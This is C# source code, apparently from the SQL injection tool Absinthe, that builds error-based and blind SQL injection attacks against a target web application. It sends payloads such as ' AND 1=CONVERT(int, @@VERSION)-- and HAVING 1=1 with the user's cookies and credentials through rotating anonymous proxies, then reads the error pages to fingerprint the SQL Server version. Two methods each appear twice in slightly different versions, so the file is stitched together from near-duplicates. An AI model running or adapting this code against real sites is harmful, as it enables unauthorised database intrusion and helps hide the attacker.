/// <summary>
/// Rebuilds the target attack vector from its saved XML form (XML to native type).
/// </summary>
/// <remarks>
/// Looks up the "attackvector" child of <paramref name="xInput"/>. When that child is
/// absent the method returns and leaves the current attack vector untouched.
/// NOTE(review): the node is handed to BuildFromXml without validation here; if it
/// originates from a saved session file, treat that file as untrusted input.
/// </remarks>
/// <param name="xInput">The XML node to start deserialization</param>
/// <param name="AnonProxies">Any anonymous proxies being used</param>
public void DeserializeAttackVector(ref XmlNode xInput, Queue AnonProxies)
{
    // The scheme follows the stored SSL flag; the rest of the URL is used as stored.
    string scheme = _UseSSL ? "https://" : "http://";
    string FullUrl = scheme + _TargetURL;

    XmlNode vectorNode = xInput.SelectSingleNode("attackvector");
    if (vectorNode == null)
    {
        return;
    }

    InjectionOptions opts;
    if (!_IsBlind)
    {
        opts = new ErrorInjectionOptions();
    }
    else
    {
        // Blind mode carries three extra settings that the error-based options lack.
        BlindInjectionOptions blindOpts = new BlindInjectionOptions();
        blindOpts.Delimiter = _FilterDelimiter;
        blindOpts.Tolerance = _Tolerance;
        blindOpts.Throttle = _ThrottleValue;
        opts = blindOpts;
    }

    opts.TerminateQuery = _TerminateQuery;
    opts.WebProxies = AnonProxies;

    AttackVectorFactory factory = new AttackVectorFactory(FullUrl, "", "", _ParamList, _ConnectionMethod, opts);
    _TargetAttackVector = factory.BuildFromXml(vectorNode, opts, _Plugins.GetPluginByName(_LoadedPluginName));

    // Forward the rebuilt vector's status events through this object's own handler.
    _TargetAttackVector.UserStatus += new UserEvents.UserStatusEventHandler(BubbleUserStatus);
}
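/// <summary>
/// Reads the connection and injection settings from the form, builds an
/// AttackVectorFactory from them and stores the resulting attack vector in
/// _AbsintheState.TargetAttackVector.
/// </summary>
/// <remarks>
/// Returns early when no connect method is set or when the form parameters name no
/// injection point. The cookies, user agent and network credential entered in the
/// form are copied into the injection options handed to the factory. Any exception
/// raised during the scan is written to the debug output and its message is shown
/// through UserStatus; the initialise button and the cursor are restored in every case.
/// </remarks>
private void InitializeAttackVectors()
{
    string URL = ctlConnection1.UseSsl == true ? "https://" : "http://";
    URL += ctlConnection1.TargetUrl;

    string Method = ctlConnection1.ConnectMethod;
    // Null-safe check: a missing connect method is treated the same as an empty one.
    if (String.IsNullOrEmpty(Method))
    {
        return;
    }

    SafelyChangeCursor(Cursors.WaitCursor);

    // Collect the injection point and the remaining form parameters.
    string TargetName = String.Empty;
    string TargetField = String.Empty;
    bool InjectAsString;
    NameValueCollection Others = FormParameters.FormParameters(ref TargetName, ref TargetField, out InjectAsString);
    NameValueCollection Cookies = FormParameters.Cookies;

    if (String.IsNullOrEmpty(TargetName))
    {
        UserStatus("No Injection Point Found");
        SafelyChangeCursor(Cursors.Default);
        return;
    }

    UserStatus("Beginning Preliminary Scan");

    try
    {
        SafelyChangeEnableOfControl(butInitializeInjection, false);

        InjectionOptions opts;
        if (optBlindInjection.Checked == true)
        {
            BlindInjectionOptions blindOpts = new BlindInjectionOptions();
            blindOpts.Tolerance = _AbsintheState.FilterTolerance;
            blindOpts.Delimiter = _AbsintheState.FilterDelimiter;
            opts = blindOpts;
        }
        else
        {
            ErrorInjectionOptions errorOpts = new ErrorInjectionOptions();
            errorOpts.VerifyVersion = chkVerifyVersion.Checked;
            opts = errorOpts;
        }

        opts.TerminateQuery = _AbsintheState.TerminateQuery;
        opts.Cookies = Cookies;
        opts.WebProxies = _AppSettings.ProxyQueue();
        opts.InjectAsString = InjectAsString;
        opts.UserAgent = _AbsintheState.UserAgent;
        opts.AuthCredentials = ctlUserAuth1.NetworkCredential;
        opts.AppendedQuery = _AbsintheState.AppendedText;

        AttackVectorFactory avf = new AttackVectorFactory(URL, TargetName, TargetField, Others, Method, opts);
        avf.UserStatus += new UserEvents.UserStatusEventHandler(UserStatus);

        int PluginNumber = Array.IndexOf(_PluginEntries, _AbsintheState.LoadedPluginName);
        IPlugin pt = null;

        if (optBlindInjection.Checked)
        {
            foreach (IPlugin bp in _AbsintheState.PluginList)
            {
                // Type test rather than an interface lookup by name, so the cast below cannot fail.
                if (bp is IBlindPlugin && bp.PluginDisplayTargetName == _AbsintheState.LoadedPluginName)
                {
                    pt = bp;
                    break;
                }
            }

            // NOTE(review): pt is still null when no loaded blind plugin matches the selected
            // name; confirm that BuildBlindSqlAttackVector accepts a null plugin.
            _AbsintheState.TargetAttackVector = avf.BuildBlindSqlAttackVector(_AbsintheState.FilterTolerance, (IBlindPlugin)pt);
            UserStatus("Finished initial scan");
        }
        else if (optErrorBasedInjection.Checked)
        {
            // Index 0 or "not found" (-1) both fall back to auto-detection.
            if (PluginNumber <= 0)
            {
                // NOTE(review): an UnsupportedSQLErrorVersionException raised inside this call is
                // handled by the outer catch, not by the report dialog below; confirm that is intended.
                pt = AutoDetectPlugin(avf);
            }
            else
            {
                foreach (IPlugin ep in _AbsintheState.PluginList)
                {
                    if (ep.PluginDisplayTargetName == _AbsintheState.LoadedPluginName)
                    {
                        pt = ep;
                        break;
                    }
                }
            }

            if (pt != null)
            {
                try
                {
                    _AbsintheState.TargetAttackVector = avf.BuildSqlErrorAttackVector((IErrorPlugin)pt);
                    UserStatus("Finished initial scan");
                }
                catch (UnsupportedSQLErrorVersionException sqlex)
                {
                    // The report dialog is shown through Invoke, i.e. on the thread that owns this form.
                    ErrorReportingDelegate ts = new ErrorReportingDelegate(ThreadUnsafeDisplayErrorReportDialog);
                    this.Invoke(ts, new object[] { sqlex.VersionErrorPageHtml, sqlex.HavingErrorPageHtml });
                }
            }
        }
    }
    catch (Exception e)
    {
        System.Diagnostics.Debug.WriteLine(e.ToString());
        UserStatus(e.Message);
    }
    finally
    {
        SafelyChangeEnableOfControl(butInitializeInjection, true);
        SafelyChangeCursor(Cursors.Default);
    }
}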
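/// <summary>
/// Chooses the error-based plugin to use by passing every loaded IErrorPlugin to
/// SqlErrorAttackVector.AutoDetectPlugins and acting on the number of matches.
/// </summary>
/// <param name="avf">The attack vector factory passed through to the detection call</param>
/// <returns>
/// The single matching plugin; the first loaded error plugin when the detection call
/// returns no match; or null when several plugins match (the candidates are listed to
/// the user) or when no error plugin is loaded at all.
/// </returns>
private IErrorPlugin AutoDetectPlugin(AttackVectorFactory avf)
{
    List<IErrorPlugin> PluginList = new List<IErrorPlugin>();
    foreach (IPlugin ep in _AbsintheState.PluginList)
    {
        // A type test replaces the interface lookup by name followed by a hard cast:
        // it cannot match an unrelated interface that merely shares the name.
        IErrorPlugin candidate = ep as IErrorPlugin;
        if (candidate != null)
        {
            PluginList.Add(candidate);
        }
    }

    // A rotated proxy is used only when the application settings say a proxy is in use.
    IErrorPlugin[] pl = SqlErrorAttackVector.AutoDetectPlugins(
        PluginList.ToArray(),
        avf,
        (_AppSettings.ProxyInUse) ? _AppSettings.RotatedProxy() : null);

    if (pl.Length == 1)
    {
        ChangeSelectedPluginText(pl[0].PluginDisplayTargetName);
        return pl[0];
    }

    if (pl.Length == 0)
    {
        // Guard the fallback: indexing an empty list would throw ArgumentOutOfRangeException.
        if (PluginList.Count == 0)
        {
            return null;
        }

        ChangeSelectedPluginText(PluginList[0].PluginDisplayTargetName);
        return PluginList[0];
    }

    System.Text.StringBuilder sb = new System.Text.StringBuilder();
    sb.Append("Multiple plugins support this version of SQL Server. Please select one of the following:");
    foreach (IErrorPlugin epl in pl)
    {
        sb.Append(Environment.NewLine).Append(epl.PluginDisplayTargetName);
    }
    UserMessage(sb.ToString());

    // No automatic choice is made between several matches; the user has to pick one.
    return null;
}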
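/// <summary>
/// Automatically uses the available plugins to find a possible match.
/// </summary>
/// <remarks>
/// Sends one request built from the factory's current vector buffer and options, then
/// searches the response text for each plugin's known version strings. The factory's
/// AttackParams entry for the vector is overwritten and is not restored afterwards.
/// The match depends on the target returning database error text in its HTTP response;
/// an application that uses parameterized queries and returns generic error pages gives
/// this check nothing to match.
/// </remarks>
/// <param name="PossiblePlugins">The collection of possible error plugins</param>
/// <param name="avf">The attack vector factory that will be used to generate the tests</param>
/// <param name="Wp">The web proxy to use for the tests</param>
/// <returns>Every plugin with at least one known version string found in the response</returns>
/// <exception cref="UnsupportedSQLErrorVersionException">
/// No plugin matched; carries the first response page and the page from a second request.
/// </exception>
public static IErrorPlugin[] AutoDetectPlugins(IErrorPlugin[] PossiblePlugins, AttackVectorFactory avf, WebProxy Wp)
{
    StringBuilder CurrentVector = new StringBuilder();
    CurrentVector.Append(avf.VectorBuffer);
    if (avf.Options.InjectAsString)
    {
        CurrentVector.Append("'");
    }
    CurrentVector.Append(" AND 1=CONVERT(int, @@VERSION)");
    if (avf.Options.TerminateQuery)
    {
        CurrentVector.Append("--");
    }
    else if (avf.Options.InjectAsString)
    {
        CurrentVector.Append(" AND '1'='1");
    }

    avf.AttackParams[avf.VectorName] = CurrentVector.ToString();

    string ResultPage = httpConnect.PageRequest(avf.TargetUrl, avf.AttackParams, Wp, avf.isPost,
        avf.Options.Cookies, avf.Options.AuthCredentials, avf.Options.UserAgent);

    List<IErrorPlugin> FoundValues = new List<IErrorPlugin>();
    foreach (IErrorPlugin Plugin in PossiblePlugins)
    {
        foreach (string VersionString in Plugin.KnownSupportedVersions)
        {
            // Ordinal search: version strings are fixed tokens and must not be matched
            // under the rules of the current UI culture.
            if (ResultPage.IndexOf(VersionString, System.StringComparison.Ordinal) >= 0)
            {
                FoundValues.Add(Plugin);
                break; // one hit per plugin is enough
            }
        }
    }

    if (FoundValues.Count > 0)
    {
        return FoundValues.ToArray();
    }

    // Nothing matched: fetch a second page so the exception carries both for the error report.
    CurrentVector = new StringBuilder();
    CurrentVector.Append(avf.VectorBuffer);
    if (avf.Options.InjectAsString)
    {
        CurrentVector.Append("'");
    }
    CurrentVector.Append(" HAVING ");
    if (avf.Options.InjectAsString && !avf.Options.TerminateQuery)
    {
        CurrentVector.Append("'1'='1");
    }
    else
    {
        CurrentVector.Append("1=1");
    }
    if (avf.Options.TerminateQuery)
    {
        CurrentVector.Append("--");
    }

    avf.AttackParams[avf.VectorName] = CurrentVector.ToString();

    string HavingResultPage = httpConnect.PageRequest(avf.TargetUrl, avf.AttackParams, Wp, avf.isPost,
        avf.Options.Cookies, avf.Options.AuthCredentials, avf.Options.UserAgent);

    throw new UnsupportedSQLErrorVersionException(ResultPage, HavingResultPage);
}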
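/// <summary>
/// Automatically uses the available plugins to find a possible match.
/// </summary>
/// <remarks>
/// One request is issued with a value built from the factory's vector buffer and option
/// flags, and the returned page is searched for the version strings each plugin declares.
/// Side effect: avf.AttackParams[avf.VectorName] is replaced and left holding the last
/// value written here. Cookies, credentials and the user agent from the options are sent
/// with each request. The check only succeeds when the response contains database error
/// text, so generic error pages on the application side leave it with no match.
/// </remarks>
/// <param name="PossiblePlugins">The collection of possible error plugins</param>
/// <param name="avf">The attack vector factory that will be used to generate the tests</param>
/// <param name="Wp">The web proxy to use for the tests</param>
/// <returns>The plugins whose known version strings appear in the response page</returns>
/// <exception cref="UnsupportedSQLErrorVersionException">
/// Thrown when no plugin matches; holds the first response and a second response page.
/// </exception>
public static IErrorPlugin[] AutoDetectPlugins(IErrorPlugin[] PossiblePlugins, AttackVectorFactory avf, WebProxy Wp)
{
    StringBuilder CurrentVector = new StringBuilder();
    CurrentVector.Append(avf.VectorBuffer);
    if (avf.Options.InjectAsString)
    {
        CurrentVector.Append("'");
    }
    CurrentVector.Append(" AND 1=CONVERT(int, @@VERSION)");
    if (avf.Options.TerminateQuery)
    {
        CurrentVector.Append("--");
    }
    else if (avf.Options.InjectAsString)
    {
        CurrentVector.Append(" AND '1'='1");
    }
    avf.AttackParams[avf.VectorName] = CurrentVector.ToString();

    string ResultPage = httpConnect.PageRequest(avf.TargetUrl, avf.AttackParams, Wp, avf.isPost,
        avf.Options.Cookies, avf.Options.AuthCredentials, avf.Options.UserAgent);

    List<IErrorPlugin> FoundValues = new List<IErrorPlugin>();
    foreach (IErrorPlugin Plugin in PossiblePlugins)
    {
        foreach (string VersionString in Plugin.KnownSupportedVersions)
        {
            // Compare ordinally; the default overload is culture-sensitive, which is
            // wrong for fixed machine-readable tokens.
            bool pageHasVersion = ResultPage.IndexOf(VersionString, System.StringComparison.Ordinal) >= 0;
            if (pageHasVersion)
            {
                FoundValues.Add(Plugin);
                break;
            }
        }
    }

    // The list being empty is the "no version found" condition; no separate flag is needed.
    if (FoundValues.Count == 0)
    {
        CurrentVector = new StringBuilder();
        CurrentVector.Append(avf.VectorBuffer);
        if (avf.Options.InjectAsString)
        {
            CurrentVector.Append("'");
        }
        CurrentVector.Append(" HAVING ");
        if (avf.Options.InjectAsString && !avf.Options.TerminateQuery)
        {
            CurrentVector.Append("'1'='1");
        }
        else
        {
            CurrentVector.Append("1=1");
        }
        if (avf.Options.TerminateQuery)
        {
            CurrentVector.Append("--");
        }
        avf.AttackParams[avf.VectorName] = CurrentVector.ToString();

        // The second page is collected only so both pages can be attached to the exception.
        string HavingResultPage = httpConnect.PageRequest(avf.TargetUrl, avf.AttackParams, Wp, avf.isPost,
            avf.Options.Cookies, avf.Options.AuthCredentials, avf.Options.UserAgent);

        throw new UnsupportedSQLErrorVersionException(ResultPage, HavingResultPage);
    }

    return FoundValues.ToArray();
}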
/// <summary>
/// Restores the attack vector from XML into the native type.
/// </summary>
/// <remarks>
/// Does nothing when <paramref name="xInput"/> has no "attackvector" child. Otherwise
/// the options are rebuilt from this object's stored settings and the node is passed to
/// the factory's BuildFromXml together with the plugin looked up by its stored name.
/// NOTE(review): nothing in this method validates the node's content; presumably it is
/// read from a saved file, which should then be handled as untrusted input.
/// </remarks>
/// <param name="xInput">The XML node to start deserialization</param>
/// <param name="AnonProxies">Any anonymous proxies being used</param>
public void DeserializeAttackVector(ref XmlNode xInput, Queue AnonProxies)
{
    string FullUrl = (_UseSSL ? "https://" : "http://") + _TargetURL;

    XmlNode savedVector = xInput.SelectSingleNode("attackvector");
    if (savedVector == null)
    {
        return;
    }

    InjectionOptions opts;
    if (_IsBlind)
    {
        // Only the blind options expose delimiter, tolerance and throttle.
        BlindInjectionOptions blind = new BlindInjectionOptions();
        blind.Delimiter = _FilterDelimiter;
        blind.Tolerance = _Tolerance;
        blind.Throttle = _ThrottleValue;
        opts = blind;
    }
    else
    {
        opts = new ErrorInjectionOptions();
    }

    opts.TerminateQuery = _TerminateQuery;
    opts.WebProxies = AnonProxies;

    AttackVectorFactory avf = new AttackVectorFactory(FullUrl, "", "", _ParamList, _ConnectionMethod, opts);
    _TargetAttackVector = avf.BuildFromXml(savedVector, opts, _Plugins.GetPluginByName(_LoadedPluginName));

    // Status events raised by the restored vector are relayed through BubbleUserStatus.
    _TargetAttackVector.UserStatus += new UserEvents.UserStatusEventHandler(BubbleUserStatus);
}